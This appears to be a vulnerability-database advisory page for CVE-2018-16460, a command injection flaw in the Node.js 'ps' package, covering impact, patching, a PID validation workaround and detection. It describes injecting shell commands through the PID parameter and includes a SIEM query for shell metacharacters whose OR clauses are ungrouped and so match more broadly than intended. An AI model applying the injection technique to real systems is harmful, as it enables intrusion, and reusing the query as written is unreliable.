Login Sign Up

CVE-2018-16460

9.8 CRITICAL
Remote Code Execution

📋 TL;DR

This vulnerability allows remote command injection in the ps package for Node.js when an attacker controls the PID parameter. It enables arbitrary command execution on the host system. Any Node.js application using vulnerable ps package versions is affected.

💻 Affected Systems

Products:
  • ps package for Node.js
Versions: All versions < 1.0.0
Operating Systems: All operating systems where Node.js runs
Default Config Vulnerable: ⚠️ Yes
Notes: Any Node.js application that uses the ps package with user-controlled PID input is vulnerable.

📦 What is this software?

Ps by Umbraengineering

View all CVEs affecting Ps →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full system compromise with root-level arbitrary command execution leading to data theft, ransomware deployment, or complete system takeover.

🟠

Likely Case

Remote code execution allowing attacker to run commands with the same privileges as the Node.js process, potentially leading to lateral movement within the network.

🟢

If Mitigated

Limited impact if running with minimal privileges and proper input validation, though still dangerous due to command execution capability.

🌐 Internet-Facing: HIGH - Web applications using this package could be exploited remotely without authentication.
🏢 Internal Only: HIGH - Internal applications remain vulnerable to authenticated users or attackers who gain internal access.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: CONFIRMED
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Exploitation is straightforward - attacker simply needs to inject shell commands into the PID parameter. Multiple public PoCs exist.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.0.0 and later

Vendor Advisory: https://www.npmjs.com/advisories/750

Restart Required: Yes

Instructions:

1. Update package.json to require ps version >=1.0.0. 2. Run 'npm update ps' or 'yarn upgrade ps'. 3. Restart the Node.js application.

🔧 Temporary Workarounds

Input Validation and Sanitization

all

Implement strict input validation on PID parameters to only accept numeric values

// JavaScript example: if (!/^\d+$/.test(pid)) throw new Error('Invalid PID')

Package Removal

all

Remove the ps package if not essential and use alternative process management methods

npm uninstall ps
yarn remove ps

🧯 If You Can't Patch

  • Run Node.js application with minimal privileges (non-root user)
  • Implement network segmentation to limit blast radius if exploited

🔍 How to Verify

Check if Vulnerable:

Check package.json or run 'npm list ps' to see installed version

Check Version:

npm list ps | grep ps

Verify Fix Applied:

Verify ps version is >=1.0.0 using 'npm list ps' or check package.json

📡 Detection & Monitoring

Log Indicators:

  • Unusual process spawns from Node.js application
  • Suspicious command execution patterns in system logs

Network Indicators:

  • Unexpected outbound connections from Node.js process
  • Command and control traffic patterns

SIEM Query:

process.name:node AND process.args:*ps* AND process.args:*;* OR process.args:*&* OR process.args:*|*

📊 Metadata

CVE ID: CVE-2018-16460
CVSS v3 Score: 9.8 (CRITICAL)
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-77
Published: September 7, 2018
Last Updated: November 21, 2024

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2018-16460, you might also want to check these:

CVE-2024-48841 10.0

This critical vulnerability in FLXEON software allows remote attackers to execute arbitrary code wit...

Same vulnerability type (CWE-77)
CVE-2025-59818 10.0

This vulnerability allows authenticated attackers to execute arbitrary system commands by manipulati...

Same vulnerability type (CWE-77)
CVE-2024-28354 10.0

This is a critical command injection vulnerability in TRENDnet TEW-827DRU routers that allows remote...

Same vulnerability type (CWE-77)